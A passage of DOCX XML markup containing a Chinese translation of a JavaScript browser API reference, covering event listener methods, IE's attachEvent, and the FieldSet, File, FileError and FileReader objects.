        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>更复杂的类型的合成事件，只能去在线查阅初始化方法的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void removeEventListener(string type,function listener,[boolean useCapture])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法移除一个已注册的事件</w:t>
      </w:r>
      <w:r>
        <w:t>listener</w:t>
      </w:r>
      <w:r>
        <w:t>函数。它和</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>需要的参数一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Internet Explorer</w:t>
      </w:r>
      <w:r>
        <w:t>的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本不支持</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>removeEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>。它们实现了下</w:t>
      </w:r>
      <w:r>
        <w:t>面两个非常相似的方法来代替。（</w:t>
      </w:r>
      <w:r>
        <w:t>17.2.4</w:t>
      </w:r>
      <w:r>
        <w:t>节列出了一些重要的差异。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void attachEvent(string type,function listener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将指定的</w:t>
      </w:r>
      <w:r>
        <w:t>listener</w:t>
      </w:r>
      <w:r>
        <w:t>函数注册为类型为指定</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>的事件的事件处理程序。注意这个方法的</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>需要在事件名前面包含</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void detachEvent(string type,function listener)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法的作用与</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>相反。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="820" w:name="FieldSet"/>
      <w:r>
        <w:t>FieldSet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="820"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>fieldset</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Ele</w:t>
      </w:r>
      <w:r>
        <w:t>ment</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>FieldSet</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>fieldset</w:t>
      </w:r>
      <w:r>
        <w:t>＞。</w:t>
      </w:r>
      <w:r>
        <w:t>FieldSet</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>的大部分但不是所有属性和方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean disabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>FieldSet</w:t>
      </w:r>
      <w:r>
        <w:t>禁用则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。禁用</w:t>
      </w:r>
      <w:r>
        <w:t>FieldSet</w:t>
      </w:r>
      <w:r>
        <w:t>会同时禁用它包含的表单控件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLFormControlsCollection elements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>包含当前＜</w:t>
      </w:r>
      <w:r>
        <w:t>fieldset</w:t>
      </w:r>
      <w:r>
        <w:t>＞内的所有表单控件的类数组对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="821" w:name="File"/>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:bookmarkEnd w:id="821"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本地文件系统中的文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>是一个具有名字同</w:t>
      </w:r>
      <w:r>
        <w:t>时可能也有一个修改日期的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>。它代表本地文件系统中的一个文件。可以从一个由＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type=file</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素组成的</w:t>
      </w:r>
      <w:r>
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:t>数组中，或者从一个由与</w:t>
      </w:r>
      <w:r>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:t>事件的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象关联的</w:t>
      </w:r>
      <w:r>
        <w:t>DataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象组成的</w:t>
      </w:r>
      <w:r>
        <w:t>files</w:t>
      </w:r>
      <w:r>
        <w:t>数组中，取得一个用户选择的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>也可以在私有的沙箱文件系统中获取</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象，就像</w:t>
      </w:r>
      <w:r>
        <w:t>22.7</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍过的一样。在写作本书的时候，文件系统的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>还不是很稳定，该部分没有对应的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>对象或者将</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>传入</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest.send()</w:t>
      </w:r>
      <w:r>
        <w:t>来将一个文件</w:t>
      </w:r>
      <w:r>
        <w:t>的内容上传到服务器，除此之外</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象本身不支持别的操作。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>来读一个</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>（或者任意</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>）的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Date lastModifedDate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前文件的修改日期，如果不可用则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前文件的文件名（不包括路径）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="822" w:name="FileError"/>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:bookmarkEnd w:id="822"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>读文件时的错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:r>
        <w:t>对象代表使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>FileReaderSync</w:t>
      </w:r>
      <w:r>
        <w:t>读一个文件时发生的错误。如果使用同步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，将抛出</w:t>
      </w:r>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>果使用异步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，分发错误事件时</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值将是对应的</w:t>
      </w:r>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>FileWriter API</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>22.7</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍过，不过它还不够稳定，因此该部分没有相关文档）为这个对象添加了新的错误代码常量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:r>
        <w:t>错误代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short NOT_FOUND_ERR=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文件不存在。</w:t>
      </w:r>
      <w:r>
        <w:t>（可能在用户选中它后它被删除了，然后程序尝试去读它。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short SECURITY_ERR=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>未知的安全问题阻止浏览器执行读取文件的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short ABORT_ERR=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>中止读取文件的尝试。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short NOT_READABLE_ERR=4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文件不可读，可能因为它的权限已改变或者因为另一个进程把它锁定了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsigned short ENCODING_ERR=5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>readAsDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>失败，因为文件太长，无法编码为一个</w:t>
      </w:r>
      <w:r>
        <w:t>data://URL</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short code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性指明发生的错误的种类。它的值为上面的常量之一。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="823" w:name="FileReader"/>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:bookmarkEnd w:id="823"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异步读取一个</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>定义读取</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的异步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。可通过下面的步骤读取一个文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>定义需要的事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Blog</w:t>
      </w:r>
      <w:r>
        <w:t>对象传入</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个读取方法中的一个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>触发</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序时，文件内容将可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性访问。或者，如果触发</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序，</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>属性将指向一个提供更多信息的</w:t>
      </w:r>
      <w:r>
        <w:t>FileError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>读取完成时，可以重用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象或根据需要丢弃它并创建一个新的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于在工作线程中可使用的同步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，参见</w:t>
      </w:r>
      <w:r>
        <w:t>fileReaderSync</w:t>
      </w:r>
      <w:r>
        <w:t>。</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FileReader()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象，不需要参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的常量是</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性可能的值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short EMPTY=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>还没有读取方法被调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short LOADING=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正在读取中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsigned short DONE=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
